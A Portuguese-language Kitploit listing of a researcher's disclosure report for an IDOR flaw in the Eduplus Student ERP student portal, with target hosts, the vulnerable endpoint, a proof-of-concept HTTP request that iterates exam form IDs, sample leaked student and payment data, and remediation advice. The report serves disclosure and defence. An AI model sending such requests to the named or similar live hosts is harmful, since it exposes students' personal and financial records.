Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-35678 — Relatório detalhado de pesquisa de vulnerabilidade sobre um IDOR no Eduplus Student ERP, incluindo análise técnica, PoC, avaliação de impacto e recomendações de remediação. | Kitploit
Ferramentas/GitHubGitHub/sharma19d/cve-2026-35678
Análise de VulnerabilidadesExploraçãoColeta de InformaçõesSegurança WebTestes de Penetração
GitHubsharma19d/cve-2026-35678

CVE-2026-35678

Relatório detalhado de pesquisa de vulnerabilidade sobre um IDOR no Eduplus Student ERP, incluindo análise técnica, PoC, avaliação de impacto e recomendações de remediação.

Ver Repositório
4há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Relatório de Pesquisa de Vulnerabilidade: Referência Direta Insegura a Objeto (IDOR) em Todo o Eduplus Student ERP

Pesquisador: Vinay Sharma

1. Resumo Executivo

Este relatório detalha uma vulnerabilidade de segurança de alta gravidade identificada na plataforma Eduplus Student ERP, especificamente no portal do aluno (learnerapi.pceterp.in). A aplicação sofre de uma Referência Direta Insegura a Objeto (IDOR) Universal no endpoint de envio de formulários de exame, permitindo que qualquer usuário autenticado (aluno) recupere os dados pessoais e financeiros sensíveis de qualquer outro aluno manipulando os identificadores do formulário.

A vulnerabilidade permite a coleta em larga escala de registros de alunos, incluindo Informações de Identificação Pessoal (PII) e trilhas de auditoria detalhadas de transações financeiras.


2. Detalhes da Vulnerabilidade

  • Host Alvo: learnerapi.pceterp.in, learner.zealerp.in, learner.despu.edu.in, etc.
  • Endpoint Afetado: POST /ExamForm/viewSubmitExamForm
  • Tipos de Vulnerabilidade:
    • Referência Direta Insegura a Objeto (IDOR) [CWE-639]
    • Criptografia Fraca (AES-ECB com Chave Fixa) [CWE-327, CWE-798]
    • Exposição de Dados Sensíveis [CWE-312]
  • Gravidade: Alta (CVSS v3.1 Estimado: 7.5 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

  • 3. Análise Técnica

    3.1 Referência Direta Insegura a Objeto (IDOR)

    A vulnerabilidade reside no endpoint viewSubmitExamForm. O servidor depende de dois parâmetros fornecidos pelo cliente para identificar o registro a ser recuperado:

    1. Corpo da Requisição: {"formid": "XXXXX"}
    2. Cabeçalho HTTP: Router-Path: /view-pcu-exam-form/XXXXX

    Embora o usuário precise estar autenticado, o servidor não verifica se o aluno autenticado está autorizado a visualizar os dados associados ao formid solicitado. Ao iterar por IDs numéricos, um atacante pode acessar os registros de outros alunos.

    4. Prova de Conceito (PoC)

    4.1 Exploração do IDOR

    Uma requisição POST padrão ao endpoint vulnerável com um formid modificado retorna dados sensíveis do aluno.

    Requisição:

    root@kitploit:~
    POST /ExamForm/viewSubmitExamForm HTTP/2
    Host: learnerapi.pceterp.in
    Content-Type: application/json
    Router-Path: /view-pcu-exam-form/28984
    ... (Cabeçalhos Autenticados) ...
    
    {"formid":"28984"}
    

    Resposta (Resumo dos Dados Vazados):

    root@kitploit:~
    {
      "status": "200",
      "examFormname": "B.Tech - Sem VI - Regular",
      "receipt_no": "REC/2023/54321",
      "feespaiddate": "2023-10-15",
      "ispaymentdone": {
        "username": "[email protected]",
        "received_amount": "1500.0",
        "updation_ip_address": "103.x.x.x",
        "erp_transaction_id": "ERP_998877",
        "bank_transaction_id": "BANK_ABC123",
        "paymentgateway_transaction_id": "PG_XYZ789",
        "learner": {
          "id": "12345"
        }
      }
    }
    
    5
    4
    3
    2
    1

    Enviando Idorpoc.mp4…


    5. Avaliação de Impacto

    A exploração bem-sucedida desta vulnerabilidade permite:

    • Exposição em Massa de PII: Acesso a nomes, endereços de e-mail, IDs de alunos e endereços IP de login de todo o corpo discente.
    • Vazamento de Dados Financeiros: Exposição do histórico de transações, IDs bancários e referências de gateways de pagamento. Essas informações são altamente sensíveis e podem ser usadas para engenharia social financeira ou fraude.
    • Violação de Privacidade Acadêmica: Acesso não autorizado a formulários de exame, atribuições de mentores e status de envio.

    6. Recomendações de Remediação

    6.1 Correção de Autorização (Prioridade: Alta)

    • Implementar Verificações de Autorização no Lado do Servidor: O backend deve verificar se o formid solicitado pertence ao learnerid associado à sessão ativa. Nunca confie nos parâmetros formid ou Router-Path sem validação contra o token de sessão autenticado.

    6.3 Endurecimento Geral

    • Minimizar a Saída de Dados: Garantir que a API retorne apenas os campos necessários para a visualização específica da interface. IDs de transação internos e endereços IP devem ser ocultados, a menos que sejam absolutamente necessários para o fluxo de trabalho do usuário.
    • Segurança de Sessão: Revisar o uso de cabeçalhos criptografados personalizados para gerenciamento de sessão e considerar o uso de JWTs padrão e endurecidos ou cookies seguros somente HTTP.
    Baixar ferramenta